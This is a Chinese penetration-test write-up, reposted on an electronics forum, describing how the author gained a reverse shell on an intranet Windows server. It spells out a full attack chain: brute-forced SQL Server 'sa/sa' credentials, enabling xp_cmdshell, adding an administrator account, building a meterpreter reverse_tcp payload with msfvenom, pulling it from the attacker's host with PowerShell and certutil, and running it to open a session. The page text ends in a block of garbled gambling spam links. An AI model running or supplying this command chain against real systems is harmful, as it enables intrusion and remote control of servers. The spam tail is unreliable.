吴忠躺衫网络科技有限公司

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記一次內(nèi)網(wǎng)中反彈shell的艱難歷程

jf_Fo0qk3ln ? 來(lái)源:先知社區(qū) ? 2023-03-07 09:30 ? 次閱讀

0x00 前言

最近在客戶現(xiàn)場(chǎng)對(duì)內(nèi)網(wǎng)服務(wù)器進(jìn)行滲透測(cè)試,發(fā)現(xiàn)了大量的弱口令,本次歷程就是從這里開(kāi)始···

0x01 弱口令

對(duì)目標(biāo)ip進(jìn)行端口掃描,開(kāi)放端口為80,445,1433,3389

訪問(wèn)80端口,只是一個(gè)安裝成功的界面,掃描一下目錄看是否有源碼泄露,無(wú)果

使用nmap腳本對(duì)445端口進(jìn)行掃描,看是否存在ms17010等漏洞,無(wú)果

使用超級(jí)弱口令工具爆破1433,爆破成功,賬號(hào)密碼:sa/sa

同時(shí)對(duì)3389端口進(jìn)行爆破,無(wú)果

因此確定了突破口,使用navicat成功連接sql server數(shù)據(jù)庫(kù)

0x02 連接3389

翻了一下,沒(méi)什么數(shù)據(jù),嘗試拿服務(wù)器吧,因此直接新建查詢,開(kāi)啟xp_cmdshell:


EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; 然后執(zhí)行命令

exec master..xp_cmdshell "whoami"; 是system權(quán)限,和想象中的一樣 3389是開(kāi)著的,不如加個(gè)用戶直接連接遠(yuǎn)程桌面吧

48f3e3ce-bc74-11ed-bfe3-dac502259ad0.png

加強(qiáng)密碼強(qiáng)度,重新添加


exec master..xp_cmdshell "net user test paperpen123. /add"; exec master..xp_cmdshell "net localgroup administrators test /add"; 一切都很順利,開(kāi)始連接3389,但遺憾的是

4906afea-bc74-11ed-bfe3-dac502259ad0.png

是win7,只允許單用戶登錄,如果擠他的話被發(fā)現(xiàn)就不能繼續(xù)玩耍了,還是放棄連接3389吧

0x03 powershell下載木馬

我還是把shell彈到本地來(lái)吧,方便操作,但是說(shuō)著簡(jiǎn)單,該怎么彈呢? 需要強(qiáng)調(diào)一點(diǎn),這里的內(nèi)網(wǎng)不可以訪問(wèn)外網(wǎng),因此無(wú)法使用命令從外網(wǎng)下載工具 那么可以這樣,讓他從我的本地服務(wù)器下載工具到他的服務(wù)器上就可以了 但是要關(guān)閉本機(jī)防火墻,執(zhí)行后訪問(wèn)失敗才想起來(lái)。我的ip是195.1.7.23 使用kali生成exe木馬


msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe 本地phpstudy快速搭建環(huán)境 將shell.exe放到網(wǎng)站根目錄下,鏈接為http://195.1.7.23/shell.exe 本地監(jiān)聽(tīng)8888端口

msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 195.1.7.23 LHOST => 195.1.7.23 msf5 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf5 exploit(multi/handler) > exploit 一切準(zhǔn)備就緒,就差服務(wù)器執(zhí)行shell.exe文件了。接下來(lái)的命令,大多是我朋友Calendula提供的,感謝一下 經(jīng)測(cè)試,powershell是可以執(zhí)行命令的,因此執(zhí)行朋友Calendula給的下載命令

exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient"; exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')"; 這兩句本可以合并到一起執(zhí)行,但是前面嘗試執(zhí)行其他命令時(shí)發(fā)現(xiàn)有長(zhǎng)度限制

4913e638-bc74-11ed-bfe3-dac502259ad0.png

所以拆分進(jìn)行執(zhí)行,但是遺憾的是

493592ce-bc74-11ed-bfe3-dac502259ad0.png

DownloadFile無(wú)法使用,具體因?yàn)槭裁匆矝](méi)搞清楚,因此放棄了這種方法

0x04 證書(shū)下載

朋友Calendula又給我提供了一種思路,使用certutil.exe,頓時(shí)驚呆、聞所未聞,命令如下:


exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"'; 使用dir查看,發(fā)現(xiàn)成功下載到了服務(wù)器上

494c47a8-bc74-11ed-bfe3-dac502259ad0.png

0x05 反彈成功

就差一步了,輸入下面的命令并緊張地點(diǎn)擊了執(zhí)行


exec master..xp_cmdshell 'shell.exe'; 卡住了···,又執(zhí)行了一遍,又卡住了···,又執(zhí)行了一遍,什么情況··· 回到監(jiān)聽(tīng)界面,打算按下ctrl+c重新監(jiān)聽(tīng),結(jié)果進(jìn)了meterpreter界面,原來(lái)是它卡住了···

496332e2-bc74-11ed-bfe3-dac502259ad0.png

激動(dòng)地截了張圖

4975ed4c-bc74-11ed-bfe3-dac502259ad0.png

查看了一下是不是域環(huán)境

498efc2e-bc74-11ed-bfe3-dac502259ad0.png

沒(méi)錯(cuò)是的,看來(lái)還有很長(zhǎng)的路要走。。

0x06 結(jié)語(yǔ)

這次就寫到這吧,如有進(jìn)展,還會(huì)更新。歡迎各位師傅們留言討論,互相交流,互相學(xué)習(xí),共同進(jìn)步。

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9304

    瀏覽量

    86066
  • 數(shù)據(jù)庫(kù)
    +關(guān)注

    關(guān)注

    7

    文章

    3846

    瀏覽量

    64686
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    990

    瀏覽量

    32211
  • Shell
    +關(guān)注

    關(guān)注

    1

    文章

    366

    瀏覽量

    23447
  • 腳本
    +關(guān)注

    關(guān)注

    1

    文章

    392

    瀏覽量

    14938

原文標(biāo)題:實(shí)戰(zhàn) | 記一次內(nèi)網(wǎng)中反彈shell的艱難歷程

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    【freeRTOS開(kāi)發(fā)筆記】一次坑爹的freeTOS升級(jí)

    【freeRTOS開(kāi)發(fā)筆記】一次坑爹的freeTOS-v9.0.0升級(jí)到freeRTOS-v10.4.4
    的頭像 發(fā)表于 07-11 09:15 ?4747次閱讀
    【freeRTOS開(kāi)發(fā)筆記】<b class='flag-5'>記</b><b class='flag-5'>一次</b>坑爹的freeTOS升級(jí)

    基于Go語(yǔ)言的反彈Shell命令生成工具簡(jiǎn)介

    RevShell 是個(gè)基于Go語(yǔ)言的反彈Shell命令生成工具,旨在幫助安全研究人員和滲透測(cè)試人員在需要與目標(biāo)主機(jī)建立反向連接時(shí)快速生成相應(yīng)的Shell代碼。
    發(fā)表于 08-25 09:45 ?825次閱讀
    基于Go語(yǔ)言的<b class='flag-5'>反彈</b><b class='flag-5'>Shell</b>命令生成工具簡(jiǎn)介

    STM32F429如何一次傳3000個(gè)數(shù)據(jù)?

    正點(diǎn)原子的歷程實(shí)用的是8位的數(shù)據(jù)傳輸,也就是說(shuō)最多一次能傳255個(gè)數(shù)據(jù),我要是一次想傳3000個(gè)數(shù)據(jù),應(yīng)該怎么更給程序?
    發(fā)表于 05-11 08:56

    使用HAProxy軟件的一次學(xué)習(xí)過(guò)程介紹

    一次學(xué)習(xí)過(guò)程
    發(fā)表于 06-13 10:48

    一次網(wǎng)站設(shè)計(jì)稿的方法

    一次網(wǎng)站設(shè)計(jì)稿
    發(fā)表于 06-16 09:43

    一次呼叫典型流程

    一次呼叫典型流程:一次呼叫典型流程B.1 概述本章將分別給出主叫流程和被叫流程的例子,以示一次通話過(guò)程UTRAN的典型流程。B.2 主叫流程主叫流程是指UE呼叫其它用戶
    發(fā)表于 11-28 17:57 ?26次下載

    一次電池為什么不能被充電?

    一次電池為什么不能被充電? 一次電池不能被充電再生是構(gòu)成一次電池體系的本性所決定的,因?yàn)?b class='flag-5'>一次電池的電極反應(yīng)不可逆,也就是說(shuō),放電后的放電產(chǎn)
    發(fā)表于 10-28 15:29 ?5896次閱讀

    循環(huán)充放電一次就是少一次壽命嗎?

    循環(huán)充放電一次就是少一次壽命嗎?     循環(huán)就是使用,我們是在使用電池,關(guān)心的是使
    發(fā)表于 11-11 13:59 ?866次閱讀

    電池循環(huán)充放電一次就是少一次壽命嗎?

    電池循環(huán)充放電一次就是少一次壽命嗎? 循環(huán)就是使用,我們是在使用電池,關(guān)心的是使用的時(shí)間,為了衡量充電電池
    發(fā)表于 09-06 11:05 ?3607次閱讀

    PT柜為什么要安裝一次消諧器

    PT柜可以安裝一次消諧器,那么PT柜中定要安裝一次消諧裝置嗎?
    發(fā)表于 07-22 15:44 ?3415次閱讀

    一次CH552不識(shí)別無(wú)法下載解決辦法

    一次CH552不識(shí)別解決辦法插入鏈接與圖片如何插入段漂亮的代碼片生成個(gè)適合你的列表創(chuàng)建個(gè)表格設(shè)定內(nèi)容居中、居左、居右SmartyPa
    發(fā)表于 01-12 19:15 ?5次下載
    <b class='flag-5'>記</b><b class='flag-5'>一次</b>CH552不識(shí)別無(wú)法下載解決辦法

    電氣一次識(shí)圖基礎(chǔ)

    電氣一次識(shí)圖基礎(chǔ)
    的頭像 發(fā)表于 11-12 11:24 ?2155次閱讀

    一次消諧如何接線

    一次消諧如何接線 一次消諧器是種用于消除電力系統(tǒng)諧波的裝置,通常需要與電容器和電抗器組合使用。在安裝一次消諧器時(shí),需要注意以下接線步驟:
    的頭像 發(fā)表于 03-22 16:50 ?2200次閱讀

    一次調(diào)頻和二調(diào)頻的概念 一次調(diào)頻可以實(shí)現(xiàn)無(wú)差調(diào)節(jié)?

    一次調(diào)頻和二調(diào)頻的概念 一次調(diào)頻可以實(shí)現(xiàn)無(wú)差調(diào)節(jié)? 一次調(diào)頻和二調(diào)頻的概念 1.
    的頭像 發(fā)表于 10-17 16:15 ?9652次閱讀

    基波是一次諧波么 基波與一次諧波的區(qū)別

    基波是一次諧波么 基波與一次諧波的區(qū)別? 基波和一次諧波是兩個(gè)不同的概念。 基波是在諧波分析中指的是頻率最低且沒(méi)有任何諧波成分的波形,它是構(gòu)成復(fù)雜波形的基礎(chǔ)。在正弦波,基波就是正弦波
    的頭像 發(fā)表于 04-08 17:11 ?8293次閱讀
    巴比伦百家乐的玩法技巧和规则 | 南溪县| 真人百家乐蓝盾| 百家乐官网伴侣破解版| 德州扑克冠军| 叶氏百家乐平注技巧| 星空棋牌舟山清墩| 百家乐开户优惠多的平台是哪家 | 网络百家乐官网| 上游棋牌大厅| 大世界百家乐娱乐| 属狗与属猪能做生意吗| 百家乐官网平台在线| 最新皇冠网止| 百家乐澳门路规则| 网上百家乐官网哪家较安全| 百利宫百家乐的玩法技巧和规则| 易学24山3d罗盘App| E乐博百家乐官网娱乐城| 汶上县| 赌博拘留几天| 大发888客服咨询电话| 百家乐赌博器| 百家乐一柱擎天| 7位百家乐官网扑克桌| 骰子百家乐官网的玩法技巧和规则 | 真人游戏网| 香港百家乐的玩法技巧和规则| 百家乐的必赢术| Bet百家乐官网娱乐城| 北京太阳城医院怎么样| 贵族百家乐的玩法技巧和规则| 百家乐游乐园| 百家乐技巧-百家乐开户指定代理网址| 豪博百家乐现金网| 网上百家乐官网作弊下载| 百家乐官网洗码方法| 沙龙百家乐官网破解| 百家乐官网游戏官网| 百家乐官网里面的奥妙| 百家乐官网真人娱乐场|